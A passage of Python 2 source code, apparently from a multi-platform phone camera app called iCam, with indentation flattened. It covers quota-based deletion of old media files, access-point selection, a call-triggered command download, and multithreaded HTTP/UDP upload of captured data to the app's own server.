pathFileName = aFolder + "/" + mediaFileName
if os.path.isfile(pathFileName):
try:
"""
os.unlink(pathFileName)
#TODO!!!! maybe use MoveFileBetweenAnyDrives(srcPathFileName, dstPathFileName)
"""
DebugPrint("EraseOldestFilesFromFolder(): deleting file %s." % \
pathFileName)
if GetFreeDriveSpace(aFolder[:2]) >= \
atLeastFreeDrivespaceToStop:
return
except:
DebugPrintErrorTrace()
except:
DebugPrintErrorTrace()
def EraseOldestFilesFromFolderWithFileCountQuota(aFolder, filterString,
fileCountQuota):
try:
DebugPrint("EraseOldestFilesFromFolderWithFileCountQuota(): " \
"aFolder = %s." % aFolder)
mediaFolderContent = os.listdir(aFolder)
#print "mediaFolderContent =", mediaFolderContent
if len(mediaFolderContent) <= fileCountQuota:
return
"""
# Cannot do in-place the removal since it upsets the iterator
for fileName in mediaFolderContent:
#print "fileName =", fileName
if not fileName.startswith("stdout_"):
print "Removing %s." % fileName
#mediaFolderContent.remove(fileName)
#mediaFolderContent.__delitem__(
"""
mediaFolderContentFiltered = []
for fileName in mediaFolderContent:
if fileName.startswith(filterString):
mediaFolderContentFiltered.append(fileName)
#print "mediaFolderContentFiltered =", mediaFolderContentFiltered
#sortedMediaFolderContent = sorted(mediaFolderContent)
"""
sort() without parameters is the ONLY one that works in Python 2.2.
(Info on sort at http://wiki.python.org/moin/HowTo/Sorting/.)
"""
mediaFolderContentFiltered.sort()
sortedMediaFolderContent = mediaFolderContentFiltered
#print "sortedMediaFolderContent =", sortedMediaFolderContent
for mediaFileName in sortedMediaFolderContent:
pathFileName = aFolder + "/" + mediaFileName
if os.path.isfile(pathFileName):
try:
"""
#os.unlink(pathFileName)
#TODO!!!! maybe use MoveFileBetweenAnyDrives(srcPathFileName, dstPathFileName)
"""
DebugPrint("EraseOldestFilesFromFolderWithFileCountQuota(): " \
"deleting file %s." % pathFileName)
if len(mediaFolderContent) <= fileCountQuota:
return
except:
DebugPrintErrorTrace()
except:
DebugPrintErrorTrace()
def EraseOldestFilesAndMessages():
DebugPrint("Entered EraseOldestFilesAndMessages().")
# Media - for test "."
EraseOldestFilesFromFolder(LOCAL_FOLDER_MEDIA_FILES,
AT_LEAST_FREE_DRIVESPACE_TO_STOP)
# Unsent - for test use "O:\\!\\N82\\Media"
EraseOldestFilesFromFolder(LOCAL_FOLDER_UNSENT_FILES,
AT_LEAST_FREE_DRIVESPACE_TO_STOP)
# TODO: Maybe erase BT messages older than 1 day
def DisplayDeviceId(*args):
global deviceId
DebugPrint("Entered DisplayDeviceId().")
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
# Good
# From http://wiki.forum.nokia.com/index.php/Python_on_Symbian/04._Basic_User_Interface.
"""
The ONLY problems with this one is that it has a progress bar and a
Cancel button instead of OK.
"""
globalui.global_note(unicode("Your device ID (IMEI): "
+ deviceId + "."), "wait")
elif ANDROID_OS:
DisplayNote("Your device ID (IMEI): " + deviceId + ".")
def SelectAccessPointIfNoneAvailableAndConnectToIt():
global accessPointName, accessPointRetryConnect
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
try:
"""
From http://discussion.forum.nokia.com/forum/showthread.php?t=97881
(Thread: avoid "select access point " dialog)
"""
# It seems it crashes here if accessPointName = "" (??)
accessPointList = socket.access_points()
if MY_DEBUG_STDOUT:
print "SelectAccessPointIfNoneAvailableAndConnectToIt(): " \
"The list of Access Points is:"
for accessPoint in accessPointList:
print "iapid = %d name = %s" % (accessPoint["iapid"],
accessPoint["name"])
sys.stdout.flush()
if accessPointName == u"":
global doNotDisplayRedrawInfo
doNotDisplayRedrawInfo = True
try:
if _PyS60_1_9_OR_NEWER:
iapidSelected = btsocket.select_access_point()
else:
iapidSelected = socket.select_access_point()
except:
# apo = socket.access_point(iapidSelected)
# socket.set_default_access_point(apo)
doNotDisplayRedrawInfo = False
DebugPrintErrorTrace()
doNotDisplayRedrawInfo = False
index = 0
for accessPoint in accessPointList:
if accessPoint["iapid"] == iapidSelected:
break
else:
index += 1
if (index < 0) or (index >= len(accessPointList)):
DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt():" \
" Manually selected to be in Offline mode.")
accessPointName = u""
StoreState()
return
accessPointName = accessPointList[index]["name"]
DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt(): "\
"Manually selected Acces Point with iapid = %d " \
"and name = %s." % (iapidSelected, accessPointName))
"""
DebugPrint("Manually selected Acces Point iapidSelected = %s,"\
" apo = %s with name = %s." % (iapidSelected, apo,
accessPointList[iapidSelected]["name"]) #, apo["name"]
"""
else:
if not _PyS60_1_9_OR_NEWER:
iapidSelected = -1
for accessPoint in accessPointList:
if accessPoint["name"] == accessPointName:
iapidSelected = accessPoint["iapid"]
break
if iapidSelected == -1:
DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt(): "\
"Was not able to find AP selected earlier in " \
"current list of APs. " \
"Going in Offline mode.")
accessPointName = u""
StoreState()
return
DebugPrint("SelectAccessPointIfNoneAvailableAndConnectToIt():"\
" Selected Acces Point with iapid = %d and " \
"name = %s." % (iapidSelected, accessPointName))
e32.ao_yield()
myText = "SelectAccessPointIfNoneAvailableAndConnectToIt(): " \
"Connecting to the Access Point %s." % accessPointName
DebugPrint(myText)
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
# appuifw.note(unicode(myText), "info")
if _PyS60_1_9_OR_NEWER:
# Code working on PyS60 1.9, but not on 1.4.5
"""
Strange: it seems we need to use the set_default_access_point
from socket and not btsocket on PyS60 1.9+
"""
socket.set_default_access_point(accessPointName)
else:
# socket.set_default_access_point(accessPointList[index])
# Code working on PyS60 1.4.5, but not on 1.9+
# apo = socket.access_point(accessPoint["iapid"])
apo = socket.access_point(iapidSelected)
socket.set_default_access_point(apo)
accessPointRetryConnect = False
# SetMenu() #!!!!I should uncomment this.
StoreState()
"""
for accessPoint in accessPointList:
#print "iapid = %d name = %s" % (accessPoint["iapid"],
# accessPoint["name"])
#print "name = %s" % access_point["name"]
if accessPoint["name"] == u"RDS":
#if (accessPoint["name"] == u"VF Internet pe Mobil") or
# (accessPoint["name"] == u"Vodafone live! PRE"):
#if accessPoint["name"] == u"Titan":
# I was not able to use webnwalk to upload (and most likely not
# able to download either) data to the web.
#if accessPoint["name"] == u"webnwalk":
#socket.set_default_access_point(access_point["iapid"])
print "Selecting Acces Point", accessPoint["name"]
if _PyS60_1_9_OR_NEWER:
#Code working on PyS60 1.9+, but not on 1.4.5
socket.set_default_access_point(accessPoint["name"])
else:
#Code working on PyS60 1.4.5, but not on 2.0.0
apo = socket.access_point(accessPoint["iapid"])
socket.set_default_access_point(apo) #accessPoint)
#btsocket.access_point(accessPoint["iapid"])
#apo = btsocket.access_point(accessPoint["iapid"])
#print "BTSocket: The IP address ", apo.ip
if _PyS60_1_9_OR_NEWER:
# Code working on PyS60 2.0.0, but not on 1.4.5
# see http://docs.python.org/library/socket.html
ip = socket.gethostbyname( socket.gethostname() )
print "IP address = ", ip
#print "IP address = ", socket.getaddrinfo(
# socket.gethostname(), None)[0][4][0]
#sys.stdout.flush()
print "Connected to access point", accessPoint
break
"""
except:
# accessPointName = u""
accessPointRetryConnect = True
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
accessPointName = u"[DEFAULT_AP]"
"""
If accessPointRetryConnect is True it means that connection to the
AP accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
elif ANDROID_OS:
accessPointName = u"[DEFAULT_AP]"
"""
If accessPointRetryConnect is True it means that connection to the
AP accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
elif RASPBIAN_OS:
accessPointName = u"[DEFAULT_AP]"
"""
If accessPointRetryConnect is True it means that connection to the
AP accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
elif iOS_PYOBJC:
accessPointName = u"[DEFAULT_AP]"
"""
If accessPointRetryConnect is True it means that connection to the
AP accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
elif WINDOWS_CE_OS_PYTHONCE:
accessPointName = u"[DEFAULT_AP]"
"""
If accessPointRetryConnect is True it means that connection to the
AP accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
elif WINDOWS_OS:
accessPointName = u"[Windows_PC_Internet_Connection]"
"""
If accessPointRetryConnect is True it means that connection to the
AP accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
elif UNIX_OS:
accessPointName = u"[Unix_PC_Internet_Connection]"
"""
If accessPointRetryConnect is True it means that connection to the
AP accessPointName was not successful. And this leads to retrying
connection to the AP.
"""
accessPointRetryConnect = False
def SelectAccessPoint():
global accessPointName
# We print on screen that pressing Cancel means no AP
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
appuifw.app.title = u"Press Cancel to disable AP."
accessPointName = u""
SelectAccessPointIfNoneAvailableAndConnectToIt()
if SYMBIAN_S60_OS:
appuifw.app.title = ICAM_APP_TITLE
def TelephoneCallback(state):
global deviceId
# NUMBER_WANTED = "786266000"
myText = "TelephoneCallback(): Receiving a call from number %s (call " \
"state is %s)." % (str(state[1]), str(state[0]))
DebugPrint(myText)
"""
if MY_DEBUG_STDOUT:
l = len(state[1])
if (state[1][l - len(NUMBER_WANTED) : l - 1] == NUMBER_WANTED):
print "Phone number matched ;) ! Retrieving command."
"""
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId, myText, ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
This is done in order for the application to continue running after the
call. :o - inspired from
http://discussion.forum.nokia.com/forum/showthread.php?t=120891
"""
#appuifw.note(u"TelephoneCallback(): Received a call - call state is %s." \
# % str(state[0]), "info")
appuifw.note(unicode(myText), "info")
if state[0] == telephone.EStatusRinging:
try:
# global myTimer
# myTimer.cancel()
pass
except:
DebugPrintErrorTrace()
"""
!!!!What if the call happens at the beginning of the program when the
vars are not initialized --> error
"""
# ReactiveLoop()
DownloadCommands()
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
################################UPLOADING RELATED##############################
NUM_MAX_THREADS_UPLOAD = 20
numThreadsUpload = 1
# These are crucial for Burst Photo mode
"""
To use InternetUploadBinaryDataMultiThreaded:
InternetUploadBinaryData = InternetUploadBinaryDataMultiThreaded
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = True
(should use a dedicated flag, for consistency)
with UDP also:
UPLOAD_USING_UDP = True
To use InternetUploadBinaryDataStandard in single threaded mode:
InternetUploadBinaryData = InternetUploadBinaryDataStandard
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
To use InternetUploadBinaryDataStandard in multithreaded mode:
InternetUploadBinaryData = InternetUploadBinaryDataStandard
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
There are other options also:
- simple multithreaded wo getresponse
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
# Does not call getresponse,uses TCP_NODELAY.
HTTP_INTERNET_UPLOAD_FAST = True
- fixed number of threads, with getresponse
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
# One of them has to be true not to DownloadCommands()
HTTP_INTERNET_UPLOAD_FAST = False
"""
# BEFORE_MAIN: We execute some code depending mostly on hardcoded settings!!
# Simple multithreaded wo getresponse
# if (deviceId == IMEI_6680) or (deviceId == IMEI_N82):
if deviceId == IMEI_E7:
"""
#!!!!To use normally
UPLOAD_USING_UDP = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
#MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = True
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = False
# Does not call getresponse, uses TCP_NODELAY.
HTTP_INTERNET_UPLOAD_FAST = True
"""
UPLOAD_USING_UDP = False
# MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = True
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False # True
# MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False
# MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = True
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = False
# To not call getresponse, use TCP_NODELAY.
HTTP_INTERNET_UPLOAD_FAST = False
else:
# HTTP_INTERNET_UPLOAD_FAST = False
UPLOAD_USING_UDP = False
# MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = True
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD = False
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False # True
# MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2 = False
# MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = True
MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3 = False
# To not call getresponse, use TCP_NODELAY.
HTTP_INTERNET_UPLOAD_FAST = False
# HTTP_INTERNET_UPLOAD_FAST = False
if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3:
# NOTE: this REPLICATES the same reference list from the first element for
# all the other elements
# dataToUploadAndPageOnServerForThread = [[]] * 10
dataToUploadAndPageOnServerForThread = []
for myI in range(NUM_MAX_THREADS_UPLOAD):
dataToUploadAndPageOnServerForThread.append([])
threadLock = []
for myI in range(NUM_MAX_THREADS_UPLOAD):
threadLock.append(None)
UDP_PORT = 1113
if UPLOAD_USING_UDP:
# Inet, UDP
socketUDP = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def InternetUploadThread(threadId):
global threadLock, dataToUploadAndPageOnServerForThread
threadLock[threadId] = e32.Ao_lock()
httpRequestHeader = {"Connection:": "Keep-alive",
"Content-type": "application/x-gzip",
"Accept": "text/plain"}
myHTTPConnection2 = None
while myHTTPConnection2 is None:
try:
myHTTPConnection2 = httplib.HTTPConnection(ICAM_SERVER_NAME)
except:
DebugPrintErrorTrace()
myHTTPConnection2 = None
DebugPrint("InternetUploadThread(%d): time %s, thread ready to upload " \
"packets." % \
(threadId, GetCurrentDateTimeStringWithMilliseconds()))
while True:
# for i in range(len(dataToUploadAndPageOnServerForThread[threadId])):
while len(dataToUploadAndPageOnServerForThread[threadId]) > 0:
try:
DebugPrint("InternetUploadThread(threadId = %d): before upload"\
" - time %s, len(dataToUploadAndPageOnServerForThread[threadId]) = %d." % \
(threadId,
GetCurrentDateTimeStringWithMilliseconds(),
len(dataToUploadAndPageOnServerForThread[threadId])))
"""
Remove the item at the given position in the list and return it.
(From http://docs.python.org/tutorial/datastructures.html)
"""
dataToUploadAndPageOnServerPair = \
dataToUploadAndPageOnServerForThread[threadId].pop(0)
#dataToUploadAndPageOnServerPair = \
# dataToUploadAndPageOnServerForThread[threadId][i]
if UPLOAD_USING_UDP and (dataToUploadAndPageOnServerPair[1] \
== WEBPAGE_UL_GZIPPED_STATE_AND_FILE) and \
(len(dataToUploadAndPageOnServerPair[0]) < 1460):
# Maybe see http://feetup.org/blog/dev/python/symbianPython.html
res = socketUDP.sendto(dataToUploadAndPageOnServerPair[0],
(ICAM_SERVER_NAME, UDP_PORT))
DebugPrint("InternetUploadThread(threadId = %d): after " \
"upload - time %s, socketUDP.sendto() " \
"returned res = %d." % (threadId,
GetCurrentDateTimeStringWithMilliseconds(),
res))
else:
myHTTPConnection2.request("POST",
dataToUploadAndPageOnServerPair[1],
dataToUploadAndPageOnServerPair[0],
httpRequestHeader)
"""
From http://docs.python.org/library/httplib.html:
"Note that you must have read the whole response
before you can send a new request to the server."
"""
httpResponse = myHTTPConnection2.getresponse()
# """
"""
On N82 with Linux server on the Intranet I need to give
httpResponse.read(), otherwise I get exception at the
next? call: ResponseNotReady, and then CannotSendRequest.
See also http://mail.python.org/pipermail/tutor/2003-May/022635.html:
"In order to re-use the connection, before you make the
next request, you need to read the data from the last
request. Not sure why that is, but thats the way it is.
So make sure you do your read.
Hope that helps someone else out there."
"""
httpResponseString = httpResponse.read()
DebugPrint("InternetUploadThread(): " \
"httpResponseString = %s." % httpResponseString)
# """
DebugPrint("InternetUploadThread(threadId = %d): after " \
"upload - time %s, " \
"len(dataToUploadAndPageOnServerForThread[threadId]) = %d." % \
(threadId,
GetCurrentDateTimeStringWithMilliseconds(),
len(dataToUploadAndPageOnServerForThread[threadId])))
except:
DebugPrintErrorTrace()
# if len(dataToUploadAndPageOnServerForThread[threadId]) == 0:
threadLock[threadId].wait()
# Close the connection.
myHTTPConnection2.close()
# BEFORE_MAIN: We leave here these statements and not move them in Main(), in the idea that we will split the script in more modules!!
# if SYMBIAN_OS:
if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD3:
for threadIndex in range(numThreadsUpload):
#thread.start_new_thread(InternetUploadThread, (threadIndex, ))
MyThreadStart(InternetUploadThread, (threadIndex, ))
def InternetUploadBinaryDataMultiThreaded(dataToUpload,
inetServerAddress, pageOnServer):
global threadLock, dataToUploadAndPageOnServerForThread
"""
!!!!
IMPORTANT: Need to start explicitely
http://mobile-revival.110mb.com/ReVival/UDP_stream_socket_server.php.
It seems it stops sometimes by itself - there is a timeout on
110mb.com, I guess.
if UPLOAD_USING_UDP:
myHTTPConnection = httplib.HTTPConnection(inetServerAddress)
#ICAM_SERVER_NAME
myHTTPConnection.request("GET",
"http://mobile-revival.110mb.com/ReVival/UDP_stream_socket_server.php",
"", httpRequestHeader)
"""
if not SYMBIAN_OS:
InternetUploadBinaryDataStandard(dataToUpload, inetServerAddress,
pageOnServer)
return
DebugPrint("Entered InternetUploadBinaryData() - multithreaded version: " \
"time %s, (accessPointRetryConnect = %d), " \
"pageOnServer = %s, len(dataToUpload) = %d." % \
(GetCurrentDateTimeStringWithMilliseconds(),
accessPointRetryConnect, pageOnServer,
len(dataToUpload)))
"""
if UPLOAD_USING_UDP and (pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE)\
and (len(dataToUpload) < 1460):
res = socketUDP.sendto(dataToUpload, (ICAM_SERVER_NAME, UDP_PORT))
DebugPrint("InternetUploadBinaryData() - multithreaded version: " \
"time %s, socketUDP.sendto() returned res = %d." % \
(GetCurrentDateTimeStringWithMilliseconds(), res))
return 0
"""
try:
"""
DebugPrint("InternetUploadBinaryData() - multithreaded version: " \
"dataToUploadAndPageOnServerForThread = %s." % \
(str(dataToUploadAndPageOnServerForThread)))
"""
minPackets = 1000000
minPacketsIndex = -1
for threadId in range(numThreadsUpload):
if minPackets > len(dataToUploadAndPageOnServerForThread[threadId]):
minPackets = len(dataToUploadAndPageOnServerForThread[threadId])
minPacketsIndex = threadId
DebugPrint("InternetUploadBinaryData() - multithreaded version: " \
"minPackets = %d, minPacketsIndex = %d." % \
(minPackets, minPacketsIndex))
if threadLock[minPacketsIndex] is None:
#thread.start_new_thread(InternetUploadThread, (minPacketsIndex, ))
MyThreadStart(InternetUploadThread, (minPacketsIndex, ))
dataToUploadAndPageOnServerForThread[minPacketsIndex].append(
(dataToUpload, pageOnServer))
threadLock[minPacketsIndex].signal()
except:
DebugPrintErrorTrace()
return 0
"""
Note: every function uploading through Internet uses
InternetUploadBinaryData().
"""
myHTTPConnection = None
if HTTP_INTERNET_UPLOAD_FAST:
# From http://www.cmlenz.net/archives/2008/03/python-httplib-performance-problems
realsocket = socket.socket
def socketwrap(family=socket.AF_INET, myType=socket.SOCK_STREAM, proto=0):
sockobj = realsocket(family, myType, proto)
sockobj.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
return sockobj
socket.socket = socketwrap
"""
We try connecting to the server until we succeed (hopefully this is
doable otherwise we are stuck here) :)
"""
while myHTTPConnection is None:
try:
myHTTPConnection = httplib.HTTPConnection(ICAM_SERVER_NAME)
except:
DebugPrintErrorTrace()
myHTTPConnection = None
numThreadIssued = 0
def SaveUnsentData(dataToUpload, pageOnServer):
fileExtension = None
if pageOnServer == WEBPAGE_UL_GZIPPED_TEXT:
if saveUnsentPackets != 2:
fileExtension = EXTENSION_TEXT_MESSAGE
else:
fileExtension = None
elif (pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE) or \
(pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE_PROXY_YOUTUBE):
fileExtension = EXTENSION_STATE_AND_MEDIA_FILE
elif pageOnServer == WEBPAGE_UL_GZIPPED_FILE:
# Currently not implemented.
fileExtension = EXTENSION_ARBITRARY_FILE
# return -1
try:
if fileExtension is not None:
"""
crtTime2 = GetTime()
# See http://discussion.forum.nokia.com/forum/showthread.php?116978-What-is-the-time-granularity-in-Pys60 .
numMilliseconds = (crtTime2 - int(crtTime2)) * 1000
fileName = time.strftime("%Y_%m_%d_%H_%M_%S", crtTime) + \
("_%03d%s" % (numMilliseconds, fileExtension))
"""
fileName = GetCurrentDateTimeStringWithMilliseconds() + \
fileExtension
fOutput = open(LOCAL_FOLDER_UNSENT_FILES + "/" + fileName, "wb")
fOutput.write(dataToUpload)
# fOutput.flush()
fOutput.close()
except:
DebugPrintErrorTrace()
#def TreatExceptionInternetUploadBinaryData(funcName):
def TreatException(funcName):
global internetUploadErrorsCounter, accessPointRetryConnect, \
MY_DEBUG_UPLOAD_MSG
# Reset internetUploadErrorsCounter when successful:
#internetUploadErrorsCounter = 0
# !!!!Not really a good idea SelectAccessPoint() - if there is an
# error from the operator, we do not want to have a dialog
# appearing asking for selecting an Access Point.
#SelectAccessPoint()
#global accessPointName
#accessPointName = u""
myText = "%s returned exception. " \
"Details: time = %s, free_ram = %d." % \
(funcName, GetCurrentDateTimeStringNice(), GetFreeRAM())
DebugPrint(myText)
#exceptionType, exceptionValue, exceptionTraceback = sys.exc_info()
# repr(traceback.format_tb(exceptionTraceback))
if MY_DEBUG_STDERR:
sys.stderr.write(myText + " (see above).\n\n")
#traceback.print_exc()
sys.stderr.flush()
if ANDROID_OS:
if internetUploadErrorsCounter == internetUploadMaxErrors - 1:
# !!!!TODO: finish for Android
DebugPrint("%s: internetUploadErrorsCounter became %d " \
"and accessPointRetryConnect = %d." % \
(funcName, internetUploadErrorsCounter,
accessPointRetryConnect))
elif SYMBIAN_OS:
#if internetUploadErrorsCounter == 20 - 1:
if internetUploadErrorsCounter == internetUploadMaxErrors - 1:
myText = "%s: internetUploadErrorsCounter became %d --> " \
"quitting iCam." % (funcName, internetUploadErrorsCounter)
DebugPrint(myText)
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
"""
Making MY_DEBUG_UPLOAD_MSG False to avoid giving more
errors when trying to upload the message in Quit(),
in which case Quit doesn't progress after the
message upload, being stuck in a recursive
execution with errors:
See log of N95N95N95N95N95 on June 8th, 2011:
Exiting iCam at 07:58:50 08-06-2011 - command given
from the cellphone.
...
Exiting iCam at 09:06:06 08-06-2011 - command given
from the cellphone.
...
and http://mobile-revival.110mb.com/ReVival/N95N95N95N95N95/FromPhone/stdout_2011_06_08_08_45_13.txt
"""
MY_DEBUG_UPLOAD_MSG = False
"""
TODO!!!!: In case restarting iCam doesn't help we should restart the phone.
- TODO: for this to work don't reset internetUploadErrorsCounter
to 0 when iCam starts --> store internetUploadErrorsCounter in
iCam state.
"""
Quit()
else:
# !!!!Maybe not a good idea.
DebugPrint("%s: internetUploadErrorsCounter became %d --> " \
"accessPointRetryConnect = %d and making it True; " \
"also disconnecting from access point (to attempt " \
"reconnect)." % \
(funcName, internetUploadErrorsCounter,
accessPointRetryConnect))
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
btsocket.set_default_access_point(None)
"""
We got an exception while uploading data on the Inet,
so we ASSUME we disconnected from the AP and try
to connect next time.
"""
accessPointRetryConnect = True
elif iOS_PYOBJC:
DebugPrint("%s: internetUploadErrorsCounter became %d and " \
"accessPointRetryConnect = %d." % \
(funcName, internetUploadErrorsCounter,
accessPointRetryConnect))
elif WINDOWS_OS:
DebugPrint("%s: internetUploadErrorsCounter became %d and " \
"accessPointRetryConnect = %d." % \
(funcName, internetUploadErrorsCounter,
accessPointRetryConnect))
elif WINDOWS_CE_OS_PYTHONCE:
DebugPrint("%s: internetUploadErrorsCounter became %d and " \
"accessPointRetryConnect = %d." % \
(funcName, internetUploadErrorsCounter,
accessPointRetryConnect))
"""
if ( (deviceId != IMEI_N82) and
(internetUploadErrorsCounter == 100) ) or #10)
( (deviceId == IMEI_N82) and
(internetUploadErrorsCounter == 300) ):
if MY_DEBUG_STDOUT:
print "Because internetUploadErrorsCounter == %d, we call"\
" RestartPhone()." % internetUploadErrorsCounter
sys.stdout.flush()
RestartPhone()
"""
internetUploadErrorsCounter += 1
"""
# The user can choose an AP only if he wishes from the Application
# menu or from the Remote Control Panel
if accessPointName == u"":
SelectAccessPointIfNoneAvailableAndConnectToIt()
"""
def InternetUploadBinaryDataStandard(dataToUpload, inetServerAddress,
pageOnServer, itIsASeparateThread=False):
global myHTTPConnection
global accessPointName, accessPointRetryConnect, bluetoothMode
global numThreadIssued
global useiCamServer
global MY_DEBUG_UPLOAD_MSG
# if WINDOWS_OS:
"""
Currently we don't have libssl on WinCE (and not really for Windows - plus
we test on Windows) so we use a proxy that communicates with YouTube.
WINDOWS_OS is more for testing purposes.
"""
if WINDOWS_CE_OS_PYTHONCE or WINDOWS_OS:
# if itIsASeparateThread == True:
if (pageOnServer == WEBPAGE_UL_GZIPPED_STATE_AND_FILE) and \
(itIsASeparateThread == False):
myText = "InternetUploadBinaryData(): upload the media file " \
"to YouTube (through proxy) and " \
"if useiCamServer == 2 to iCam."
DebugPrint(myText)
if MY_DEBUG_STDERR:
sys.stderr.write(myText + "\n")
sys.stderr.flush()
InternetUploadBinaryDataStandard(dataToUpload,
ICAM_GAE_SERVER_NAME,
WEBPAGE_UL_GZIPPED_STATE_AND_FILE_PROXY_YOUTUBE,
itIsASeparateThread=True)
#!!!!TODO: do better: avoid itIsASeparateThread to avoid recursion
# InternetUploadBinaryDataStandard(dataToUpload, "localhost:8080",
# "/proxyyoutube", itIsASeparateThread=True)
# return 0
if MY_DEBUG_UPLOAD_MSG:
UploadGZippedData(deviceId,
"Finished uploading media data to " \
"YouTube proxy at time %s - packet of size " \
"%d bytes." % \
(GetCurrentDateTimeStringWithMilliseconds(),
len(dataToUpload)), ICAM_SERVER_NAME,
WEBPAGE_UL_GZIPPED_TEXT, None)
"""
This means we only upload the state+video to YouTube and do not
upload anything to iCam.
"""
if useiCamServer == 0:
return 0
elif useiCamServer == 1:
"""
!!!!Do send the state, or (don't we do this already?!!!!) at least inform iCam server that you
uploaded to YouTube.
We send ONLY THE STATE data from the Bluetooth message, to the
iCam Server.
#stateData = stateFileData[struct.calcsize(deviceIdFormat) :
# struct.calcsize(deviceIdFormat) +
# struct.calcsize(statePackFormat)]
stateData = stateFileData[0 :
struct.calcsize(deviceIdFormat) +
struct.calcsize(statePackFormat)]
stateDataCompressed = stateData.encode("zlib")
UploadUnsentBinaryData(btClientDeviceId, fileName,
stateDataCompressed)
"""
#pass
#!!!!TODO We have to send the state to iCam server
return 0
elif useiCamServer == 2:
pass #!!!!TODO - I think everything is OK - we just run again this function.
"""
#inetServerAddress = "localhost:8080"
inetServerAddress = ICAM_GAE_SERVER_NAME
pageOnServer = "/proxyyoutube"
"""
"""
if inetServerAddress != "localhost:8080":
return 0
"""
if MULTITHREADED_PHOTO_BURST_MODE_UPLOAD2:
if itIsASeparateThread == False:
"""
We create a separate thread to upload the data.
We create only numThreadsUpload - 1 parallel threads to the main
thread to upload.
(Basically, we do this such that if numThreadsUpload == 1 we don't
spawn any new thread.)
"""
if numThreadIssued < numThreadsUpload - 1:
DebugPrint("InternetUploadBinaryData(): " \
"itIsASeparateThread = %d, numThreadIssued = %d. "\
"Creating a new thread for upload." % \
(itIsASeparateThread, numThreadIssued))
"""
thread.start_new_thread(InternetUploadBinaryData,
(dataToUpload, inetServerAddress, pageOnServer, True))
"""
MyThreadStart(InternetUploadBinaryData,
(dataToUpload, inetServerAddress, pageOnServer, True))
numThreadIssued += 1
# e32.ao_sleep(2)
"""
We do not report errors anymore... (being in burst mode we care
for performance, so we do not retry sending unsent).
However, we still must try to reconnect to AP if got
disconnected!!!!
"""
return 0
DebugPrint("Entered InternetUploadBinaryData(): time %s, " \
"accessPointRetryConnect = %d, inetServerAddress = %s, pageOnServer = %s, " \
"len(dataToUpload) = %d, itIsASeparateThread = %d, " \
"numThreadIssued = %d." % \
(GetCurrentDateTimeStringWithMilliseconds(),
accessPointRetryConnect,
inetServerAddress,
pageOnServer,
len(dataToUpload),
itIsASeparateThread,
numThreadIssued))
if accessPointRetryConnect:
"""
We do this to avoid getting the dialog box with the Select AP.
Unfortunately, it seems that at least on N95 when the phone's Inet AP
doesn't work, trying to reconnect to it doesn't really work...
"""
SelectAccessPointIfNoneAvailableAndConnectToIt()
res = 0
if NoInternetConnection(): # and bluetoothMode != 2):
"""
When in offline mode (accessPointName == u"") I save data in Unsent.
Otherwise, if not uploading, nor storing for later, one can just stop
iCam (we assume for the moment iCam is not processing the video
info and cannot trigger a notification via SMS/MMS or call).
"""
DebugPrint("InternetUploadBinaryData(): not uploading data now; " \
"deferring it for when we have Internet access.")
res = -1
"""#!!!!TODO: think why
elif useiCamServer == 0:
DebugPrint("InternetUploadBinaryData(): not uploading data since " \
"useiCamServer == 0.")
res = -1
"""
else:
"""
Tell the HTTP command we are sending a gz file (normally) and we want
text in the response.
"""
